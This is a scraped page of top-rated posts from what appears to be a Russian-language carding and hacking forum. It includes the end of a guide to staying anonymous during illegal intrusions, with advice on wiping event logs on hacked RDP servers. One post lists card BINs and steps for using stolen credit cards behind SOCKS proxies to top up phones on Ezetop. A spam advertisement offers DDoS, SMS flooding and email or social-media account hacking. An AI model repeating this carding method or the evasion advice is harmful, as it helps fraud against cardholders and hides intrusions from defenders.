снижает, но не устраняет риск попадания данных о состоянии сеанса гостевой ОС на жесткий диск из оперативной памяти. В свою очередь, полное отключение свопа устраняет потенциальный источник «утечки», но снижает скорость работы системы в целом. Тут придется идти на компромисс. + удобность в повседневном использовании + быстрое удаление компрометирующих данных в случае надобности + наличие образов и, как следствие, возможность сокрытия образа компрометирующей гостевой ОС + быстрая развертываемость инфраструктуры - наличие неявных каналов утечки данных из гостевой ОС в основную ОС - снижение производительности (весомый недостаток для многих) - отсутствие автономности образов гостевых ОС от используемого для виртуализации ПО 1.2 Конфиденциальность при работе с LiveCD(DVD/USB)-дистрибутивами. Широко распространена практика использования мобильных носителей с предустановленными системами. Кто-то предпочитает одну единственную систему, предназначенную для установки на flash или CD и содержащую весь необходимый инструментарий для работы в «полевых» условиях, а кто-то отдает предпочтение своей собственной сборке, настраивая все под свои нужды. При работе с данным типом операционных систем наиболее высоким показателем качества, пожалуй, является «быстроразвертываемость» (мобильность). Лучший инструмента для анонимной работы в незнакомых условиях трудно найти, чего не скажешь о повседневном использовании: отсутствие возможности сохранения данных, конфигурационных файлов и т.п. является как отрицательным фактом (в ущерб usability), так и положительным (отсутствие утечки данных в основную память рабочей станции). Манипуляция данными исключительно в оперативной памяти позволяет не беспокоиться о явных каналах утечки данных. + мобильность + возможность работы в «полевых» условиях + работа с данными исключительно в оперативной памяти - неудобство повседневного использования. 1.3 Конфиденциальность при работе с удаленными рабочими станциями (выделенными серверами). Неаккуратное использование удаленных рабочих станций для совершения незаконных действий может раскрыть нарушителя, продемонстрировав его IP-адрес или другую полезную информацию третьим лицам. Рассмотрим возможные каналы утечки данных на примере Windows-серверов, в силу их наибольшей распространенности, которая, в свою очередь, вытекает из большей степени уязвимости. При использовании службы терминалов (она же RDP) и при недостаточных «предосторожностях» есть риск попадания авторизованных действий в системные журналы (в Win NT так называемый event log: C:\WINDOWS\system32\config, все файлы которого скрытые и подлежат удалению с помощью специального ПО, наподобие Unlocker). Если установленные взломщиком программы создают сетевую активность или активно используют ресурсы сервера, бдительный администратор может заметить подозрительную сетевую активность (либо подозрительную новую службу). Есть риск попасть «под колпак», т. е. администратор имеет все возможности снифать порт, на котором висит ПО нарушителя. Отсюда, как результат, утечка конфиденциальной информации. К тому же никто не даст гарантии, что взломанный сервер не входит в сеть honeypot со всеми вытекающими… + выделенные сервера доступны 24/7 + производительность - при недостаточных мероприятиях существует возможность попасть под наблюдение администраторов сервера, со всеми вытекающими последствиями. 2. Анонимность при работе с web-ресурсами. «Независимые исследователи» защищенности web-приложений в своей работе зачастую используют цепочки прокси-серверов и/или анонимную сеть Tor (или ее аналоги, например, I2P). Рассмотрим подробнее каждую из этих схем. 2.1 Использование прокси-серверов. Техническая особенность цепочки прокси-серверов: отображение в логах целевого сайта последнего сервера в цепочке и прозрачный обмен данными между взломщиком и целевым сайтом. Однако как первый, так и второй факт можно оспорить: существует множество методов раскрытия нарушителя, который прячется за прокси-сервером, а также резкое снижение скорости соединения в силу технических особенностей. Думаю, заострять внимание на подобной схеме не имеет смысла, так как на форуме данная тема «истерта» до мелочей. Перейдем к более интересной схеме - анонимной сети Tor. 2.2 Использование анонимной сети Tor. (дан как пример) Распределенная система серверов (нодов), между которыми трафик проходит в зашифрованном виде, знакома любому, кто хоть немного задумывался над собственной анонимностью в Сети. На последней ноде в цепочке (так называемой, exit-ноде) передаваемые данные проходят процедуру расшифровки и передаются целевому серверу в открытом виде. Данный факт позволяет поставить снифер на выходной ноде и просматривать весь проходящий трафик. Звучит просто, но на самом деле все именно так. Подробнее процедура перехвата трафика в сети Tor описана в октябрьском номере журнала «Хакер» (статья «Включаем Tor на всю катушку»). + прохождение трафика в зашифрованном виде по цепочке серверов +постоянная смена цепочки (изменение маршрута следования пакетов) +возможность создания ноды - передача данных с exit-node целевому серверу в открытом виде и, как следствие, возможность перехвата пакетов. 3. … Технологию VPN я нарочно оставил за кадром, ведь обилие ее реализаций и способы использования сильно разнятся, что не позволит охватить все схемы в данном обзоре. Каждый предпочитает свою схему обеспечения конфиденциальности при работе в различных сферах ИТ и поэтому давать универсальные рекомендации я не берусь, а хочу лишь попросить читателей не стесняться и выкладывать описания своих схем для последующего детального анализа и выявления «узких» мест, которые я (и другие участники форума) с удовольствием прокомментируют в данном посте.
  23. 1 балл
    проверим, но мне кажется фуфло все, больно уж легко все...
  24. 1 балл
    У нас и так в России народу мало, а ты еще и хоронить всех вздумал :-( :-D
  25. 1 балл
  26. 1 балл
    Наш любимый Ezetop еще жив,и я расскажу как пополнить себе мобилку Матеирал: AU CC(no vbv или с vbv) и носки(под город холдера) Вот bin которые с легкостью заxодят!: 454818 - 494052 - 456448 - 443431 - 443451 - 468524 409349 - 493414 - 443420 - 552638 - 455702 - 456442 456487 - 450605 - 443458 - 421699 - 456443 - 521729 443462 - 443440 - 516329 - 456430 - 443446 - 443438 518840 - 494053 - 456471 - 456462 - 426534 - 423953 Напяливайте носочки(sokcs 5)и заходим на ezetop.com,выберите страну ,поставить номер и нажмите пополнения 1 залив пробуйте с маленькой суммой,если все проходит добиваете материал. Спасибо всем за внимание!
  27. 1 балл
    > Смс,смс флуд,Смс флуд заказать,Смс сервис,sms flood,флуд смсками,смс атака,флудилка смс,смс доставалка,как достать смсками,забомбить смсками,смс бомбилка,закидать смсками,флуд большим количеством смс,флуд на номер,отключить номер смсками,задолбать смсками,надоели смски,флуд на мобильный,флуд на сотовый,много смс на сотовый,смс на сотовый,сотовый атака,сотовый сломать,сотовая атака,смс флудер,сотовый флудер,исправный смс флуд,сгенерировать смс,смс конкуренту,смс с короткого номера,любой текст смс,смс фрикинг,сотовый фрикинг,мобильный фрикинг,смс рассылка телефонный флуд,телефонный флуд заказать,заказать телефонную атаку,задолбать звонками,флуд звонками,бесконечные звонки,как зафлудить номер,зафлудить мобильный,звонки на мобильный,телефонный маньяк,закидать звонками,надоели звонки,как заставить жертву отключить телефон,отключить сотовый,отключить мобильный,телефонный террорист,флуд террор,автодозвон на мобильный телефон, автодозвон на стационарный телефон, спам на мобильный, спам на стационарный телефон, флуд на телефон, звонки без конца, автодозвон должников, постоянные звонки на телефон, коллекторы,атака на телефон, атака на сотовый,звонки по ночам,молчание в трубку,Флуд с обычной сим карты со скрытым номером со своего софта, никаких скайпов, sip и прочего глючного софта, заказать ddos атаку, заказать ддос, ddos service, ddos сервера, ddos услуги, атака нa сервер, атака на сайт, massive ddos attack, убить сервер, мощная DDoS-атака, вывести сайт из строя, ддос сайта, нужен ддос, как навредить сайту, как удалить сайт, остановить работу сайта, отключить сайт конкурента, как завалить сайт, ddos атака, как убить сайт, need to ddos site, как устранить сайт конкурента, как убрать сайт конкурента, ddos атака на заказ, хакерская атака. Google DDos: заказать ддос атаку,заказать ddos атаку на нашем сайте,куплю ддос атаку срочно,купить ddos заказать ddos, Заказать ДДос атаку на сайт конкурента. Сервис ddos-атак. Здесь вы можете заказать ддос-атаку на ресурс. Закажу ddos атаку,где заказать ддос,ддос атака цена. как сделать ddos атаку, buy ddos attack. заказать ddos, Заказать ДДос атаку на сайт конкурента. Сервис ddos-атак. Здесь вы можете заказать ддос-атаку на ресурс заказать ддос атаку,заказать ddos взлом почт,как взломать почту,помогите взломать почту,взломать email,вскрыть почтовый ящик,взломать имеил,взломать емеил,узнать пароль от почты,вскрыть переписку,заказать взлом почты,брут почты,бруть email,атаковать почту, взлом соцсетей,взлом социальных сетей,взлом одноклассников,взлом вконтакте,взлом твитера,взлом фейсбука,узнать пароль от странички вконтакте,узнать пароль от странички в контакте,узнать пароль от одноклассников,вскрыть страничку,вскрыть личную страницу,вскрыть id,взломать страницу,прочитать переписку,страница конкурента,
  28. 1 балл
    В Москве задержаны двое подозреваемых в кредитных мошенничествах Полицейские в Москве задержали двоих мужчин, которые подозреваются в мошенничестве с кредитами. Как сообщает пресс-группа УВД по ВАО, сотрудник службы безопасности одного из банков сообщил о сомнениях в подлинности документов клиента. Как выяснилось, для получения кредита в размере 600 тыс. рублей безработный 37-летний москвич предоставил поддельный паспорт. Злоумышленник был задержан в помещении банка. Еще один подозреваемый в мошенничестве задержан полицейскими в ЦАО. По данным правоохранительных органов, год назад 41-летний безработный москвич получил в кредит 500 тыс. рублей, однако не осуществлял выплат по нему. Проверка показала, что в представленных им документах были указаны ложные сведения. В отношении обоих задержанных возбуждены уголовные дела по статье «Мошенничество», они находятся под подпиской о не выезде.
  29. 1 балл
  30. 1 балл
    в общем ну её в баню эту баню живите грязными ,но с наличкой
  31. 1 балл
    Тогда такой вопрос - а кто больше зарабатывает адвокат или нотариус?
  32. 1 балл
    Интересует прога по декоду
  33. 1 балл
    пацаны.. а вы такое видели - при реге Ебэй.. надо СС ввести?? скоро там анализы на СПИД будут требовать.. и обязательно.. свежие)) У меня тоже.. при оплате с Сс говорит.. что карта не проверена.. хотя в акке - всё нормально.. Пришлось шаманить)) Это походу даже не фрод.. а обычные глюки.. система перегружена.. я тут приторчал над ПП вообще.. на 30 баксов платеж отказалась проводить.. хотя на карте деньги были.. не.. она его провела - с 6го раза.. и на следующий день..
  34. 1 балл
    эти месячные уже третью неделю длятся...
  35. 1 балл
    также мыла от палки советовал бы читать под тем же носком или ваще не читать-) и юзай виртуалку без установленных флэш и явы плагинов для браузов
  36. 1 балл
    И уже давно, юзайте деды
  37. 1 балл
    Для дебиана, насколько я помню: apt-get install network-manager-openvpn Для федорки, редхета и иже с ними: yum install NetworkManager-openvpn У NM устанавливаемые модули есть в репозиториях, как, в прочем, много в каких других софтинах :mad:
  38. 1 балл
    Таблица размещения файлов нарушена. Ничего не восстановишь.
  39. 1 балл
    Пиздец создайте кто нибудь другую тему,сидиш на главной странице форума и название этой режут глаза и сознание!!! А по теме скажу что,лучше сказать захотят посадить посадят,но что бы посадить надо найти,а для того что бы найти,нужно посоревноваться с вашим мозгом,если он маленький как семечка,уместно слово захотят нати найдут!Хуй кто найдет если быть оккуратным и грамотным и так же иметь чуйку и язык по короче!Как говорил мне один мой старый друг,который мне в отцы годится,при разговоре с человеком надо говорить не очем и обо всем,высказывая о себе как можно меньше информации и узнавая о нем как можно больше и о его делах!Так что если срать в штаны и писать такие названия статей,нужно устраиваться наработу и нелезть в такие дела!
  40. 1 балл
    Напиши за сколько готов отдать? Видео прилагается?
  41. 1 балл
  42. 1 балл
    Может новоиспеченным курсантам такую работу дают для начала? )))
  43. 1 балл
  44. 1 балл
    Есть тут охотники и рыболовы ? интересно куда ездите на рыбалку и охоту ? Из чего стреляете чем ловите
  45. 1 балл
    что вы думаете о : http://vkontakte.ru/bestcaper и его сайте : http://vkontakte.ru/bestcaper
  46. 1 балл
  47. 1 балл
    Лично я, всегда восхищалась такими людьми, которые умудрялись годами обманывать людей, делая на них состояния. Я не говорю, что это хорошо, но такие гении афер, по истине, заслуживают уважения. К сожалению, или к счастью, что в конце концов, все они, наверное, от того, что чувство безнаказанности затмевает интуицию и чувство опасности, терпят фиаско.
  48. 1 балл
    покупай 3г модем ноут и вперед на улицу делать черные дела и про дедик не забудь
  49. 1 балл
    Таких случаев много с гаражами! Но, представляете, когда на пустом месте погибает целая семья!!!!!!! Дети, взрослые... Шансов ни у кого не остаётся...
  50. 1 балл
    Господа! У нас все в общем нормально, сотрудники ДПС адекватные, всегда идут на встречу. Между тем, ребятам из спецвзвода ДПС, которые подчиняются не обл.ГАИ, а насколько мне известно - "Москве", даже удостоверение пофигу! В информационных письмах иногда мелькает: "остановили сотрудника прокуратуры в состоянии опьянения.......", со всеми вытекающими последствиями. Это подразделение даже своих коллег не щадит. Так, в каждом районе известны случаи увольнений из ДПС после рейда Спецов. Поэтому, не для всех "закон, что дышло" )))))) Может это и к лучшему......
×
×
  • Создать...